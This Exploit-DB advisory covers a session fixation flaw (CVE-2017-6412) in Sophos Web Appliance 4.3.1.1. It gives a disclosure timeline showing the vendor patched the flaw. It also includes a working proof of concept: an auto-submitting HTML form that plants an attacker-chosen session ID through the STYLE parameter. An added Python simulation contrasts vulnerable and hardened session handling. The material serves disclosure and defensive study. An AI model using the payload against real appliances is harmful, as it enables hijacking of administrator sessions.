ID EDB-ID:42012 Type exploitdb Reporter Exploit-DB Modified 2017-02-28T00:00:00
Description
Sophos Web Appliance 4.3.1.1 - Session Fixation. CVE-2017-6412. Webapps exploit for Hardware platform
# Exploit Title: [Sophos Secure Web Appliance Session Fixation Vulnerability]
# Date: [28/02/2017]
# Exploit Author: [SlidingWindow] , Twitter: @Kapil_Khot
# Vendor Homepage: [https://www.sophos.com/en-us/products/secure-web-gateway.aspx]
# Version: [Tested on Sophos Web Appliance version 4.3.1.1. Older versions may also be affected]
# Tested on: [Sophos Web Appliance version 4.3.1.1]
# CVE : [CVE-2017-6412]
# Vendor Security Bulletin: http://wsa.sophos.com/rn/swa/concepts/ReleaseNotes_4.3.1.2.html
==================
#Product:-
==================
Sophos Secure Web Appliance is a purpose-built secure web gateway appliance which makes web protection simple. It provides advanced protection from today’s sophisticated web malware with lightning performance that won’t slow users down. You get full control and instant insights over all web activity on your network.
==================
#Vulnerabilities:-
==================
Session Fixation Vulnerability
========================
#Vulnerability Details:-
========================
#1. Session Fixation Vulnerability (CVE-2017-6412)
A remote attacker could host a malicious page on his website that makes a POST request to the victim's Sophos Web Appliance to set the Session ID via the STYLE parameter. The appliance does not validate whether the Session ID sent by the user's browser was issued by the appliance itself or fixed by an attacker.
Also, the appliance does not invalidate the pre-login Session ID it issued earlier once the user logs in successfully. It continues to use the same pre-login Session ID instead of invalidating it and issuing a new one.
Note: An attacker would have to guess or know the IP address of the victim's device.
Proof-of-Concept:
1. Visit the Sophos login page to obtain a pre-auth Session ID.
2. Host the following web page on the attacking machine, with the Session ID obtained in #1. The Session ID value can be altered slightly and is still accepted.
<html>
<body>
  <!-- Auto-submitting form that posts the fixed Session ID in the STYLE parameter -->
  <form name="Sophos_Login" action="https://192.168.253.147/index.php?c=login" method="POST">
    <input type="hidden" name="STYLE" value="Pre-Auth Session ID">
  </form>
  <script>
    window.onload = function () {
      document.forms['Sophos_Login'].submit();
    };
  </script>
</body>
</html>
3. Visit the above page from another machine.
4. You will be redirected to the login page; however, the Session ID will be the same.
5. Log into the appliance and check the Session ID; it will be the same as in #1.
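The two defects described above (adopting a Session ID the server never issued, and keeping the pre-login ID after authentication) and the five PoC steps can be replayed against an in-memory session table. The following is an added example, not code from the advisory or from Sophos; SessionStore, fixation_succeeds and the demo credential are constructed for illustration, and the appliance's real session handling is not known from the page.

```python
import hmac
import secrets
from typing import Dict, Optional

# Constructed demo credential store; a real appliance would store password hashes.
_USERS = {"admin": "constructed-demo-password"}


def check_password(user: str, password: str) -> bool:
    """Constant-time comparison against the constructed credential store."""
    expected = _USERS.get(user, "")
    return bool(expected) and hmac.compare_digest(expected, password)


class SessionStore:
    """Minimal server-side session table keyed by session ID.

    accept_client_ids=True reproduces the first defect: an ID the server never
    issued is adopted as-is. rotate_on_login=False reproduces the second: the
    pre-auth ID survives authentication. Both False/True gives the hardened form.
    """

    def __init__(self, accept_client_ids: bool, rotate_on_login: bool) -> None:
        self.accept_client_ids = accept_client_ids
        self.rotate_on_login = rotate_on_login
        self._sessions: Dict[str, Optional[str]] = {}  # sid -> logged-in user

    def _mint(self) -> str:
        """Issue a fresh, unpredictable session ID (256 bits from the CSPRNG)."""
        sid = secrets.token_urlsafe(32)
        self._sessions[sid] = None
        return sid

    def resolve(self, presented: Optional[str]) -> str:
        """Map the ID the browser presents to a server-side session.

        On the vulnerable appliance the ID arrives in the STYLE POST parameter;
        here it is just a string, since the transport does not matter.
        """
        if presented is not None and presented in self._sessions:
            return presented
        if presented is not None and self.accept_client_ids:
            # Vulnerable behaviour: trust an ID the server never issued.
            self._sessions[presented] = None
            return presented
        # Hardened behaviour: unknown IDs are ignored and a new one is issued.
        return self._mint()

    def login(self, sid: str, user: str, password: str) -> str:
        """Authenticate; returns the session ID the browser must use from now on."""
        if not check_password(user, password):
            raise PermissionError("bad credentials")
        if not self.rotate_on_login:
            # Vulnerable behaviour: the pre-auth ID becomes the authenticated ID.
            self._sessions[sid] = user
            return sid
        # Hardened behaviour: retire the pre-auth ID, bind the user to a new one.
        self._sessions.pop(sid, None)
        new_sid = self._mint()
        self._sessions[new_sid] = user
        return new_sid

    def user_for(self, sid: str) -> Optional[str]:
        return self._sessions.get(sid)


def fixation_succeeds(store: SessionStore, tweak_id: bool = False) -> bool:
    """Replay the advisory's PoC steps and report whether the ID chosen before
    login identifies the admin afterwards (True = session fixation worked)."""
    fixed = store.resolve(None)                       # step 1: obtain pre-auth ID
    if tweak_id:                                      # "can be altered slightly"
        fixed = fixed[:-1] + ("x" if fixed[-1] != "x" else "y")
    victim_sid = store.resolve(fixed)                 # steps 2-4: browser presents it
    store.login(victim_sid, "admin", "constructed-demo-password")  # step 5
    return store.user_for(fixed) == "admin"


def vulnerable_store() -> SessionStore:
    return SessionStore(accept_client_ids=True, rotate_on_login=False)


def hardened_store() -> SessionStore:
    return SessionStore(accept_client_ids=False, rotate_on_login=True)
```

Rejecting unissued IDs on its own does not close the hole, because the attacker's fixed ID in step 1 was legitimately issued; rotating the ID on successful login is the fix that defeats every variant.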
====================================
#Vulnerability Disclosure Timeline:
====================================
28/02/2017: First email to disclose the vulnerability to the vendor
28/02/2017: Vendor requested a vulnerability report
28/02/2017: Report sent to vendor.
28/02/2017: Vendor validated the report and confirmed the vulnerability
01/03/2017: CVE MITRE assigned CVE-2017-6412 to this vulnerability
03/03/2017: Vendor confirms that the fix is ready and is in the process of testing.
09/03/2017: Vendor confirmed that the patch will be released on March 17 2017 and requested to hold off publishing the CVE until March 31 2017.
17/03/2017: Vendor released the patch: http://wsa.sophos.com/rn/swa/concepts/ReleaseNotes_4.3.1.2.html
31/03/2017: Published CVE as agreed by vendor